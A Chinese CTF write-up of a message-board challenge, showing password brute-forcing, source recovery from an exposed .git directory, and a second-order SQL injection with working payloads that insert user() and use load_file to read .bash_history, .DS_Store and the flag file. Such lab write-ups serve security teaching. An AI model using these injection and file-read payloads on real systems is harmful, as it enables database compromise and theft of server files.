image.png
    这次题目是个留言板,点击发帖可以留言:
    image.png
    但是点击提交后会跳转到登录页面,并且注意到输入框中有提示:
    image.png
    密码的后三位是*,拿出burpsuit,爆破,最后得到密码是zhangwei666。
    因为题目提示是sql,所以使用sqlmap扫一下,但是没扫出来任何注入点。
    继续使用dirsearch扫描网站,最后发现了一个.git目录。使用Git_Extract将源码下载下来:

    1. <?php
    2. include "mysql.php";
    3. session_start();
    4. if($_SESSION['login'] != 'yes'){
    5.     header("Location: ./login.php");
    6.     die();
    7. }
    8. if(isset($_GET['do'])){
    9. switch ($_GET['do'])
    10. {
    11. case 'write':
    12.     $category = addslashes($_POST['category']);
    13.     $title = addslashes($_POST['title']);
    14.     $content = addslashes($_POST['content']);
    15.     $sql = "insert into board
    16.             set category = '$category',
    17.                 title = '$title',
    18.                 content = '$content'";
    19.     $result = mysql_query($sql);
    20.     header("Location: ./index.php");
    21.     break;
    22. case 'comment':
    23.     $bo_id = addslashes($_POST['bo_id']);
    24.     $sql = "select category from board where id='$bo_id'";
    25.     $result = mysql_query($sql);
    26.     $num = mysql_num_rows($result);
    27.     if($num>0){
    28.     $category = mysql_fetch_array($result)['category'];
    29.     $content = addslashes($_POST['content']);
    30.     $sql = "insert into comment
    31.             set category = '$category',
    32.                 content = '$content',
    33.                 bo_id = '$bo_id'";
    34.     $result = mysql_query($sql);
    35.     }
    36.     header("Location: ./comment.php?id=$bo_id");
    37.     break;
    38. default:
    39.     header("Location: ./index.php");
    40. }
    41. }
    42. else{
    43.     header("Location: ./index.php");
    44. }
    45. ?>

    可以看到,基本上全部语句都被加上了addslashes过滤,但是唯独有一处没有,就是提交留言处:

    1. $sql = "select category from board where id='$bo_id'";
    2. $result = mysql_query($sql);

    这里代码从数据库中拿到category的内容后,直接就进行了mysql查询,而category的内容是我们自己控制的,这里就造成了二次注入。
    (虽然前面有addslashes函数过滤,但是插入到数据库后,是不会有\的。)
    所以可以构造payload:

    1. 123',content=user(),/*

    接着在留言处提交

    1. */#

    结合起来就是

    1. $sql = "insert into comment
    2.             set category = '123',content=user(),/*',
    3.                 content = '*/#',
    4.                 bo_id = '$bo_id'";

    得到回显:
    image.png
    接下来继续找flag位置,但这里我找不到了,最后看writeup才知道,还要读取bash_history,看到.DS_Store的位置,并且去读取,最后才知道flag的位置。
    payload:

    1. 123',content=(select hex(load_file("/home/www/.bash_history"))),/*    
    2. 123',content=(select hex(load_file("/tmp/.DS_Store"))),/*
    3. 123',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*
    4. 123',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*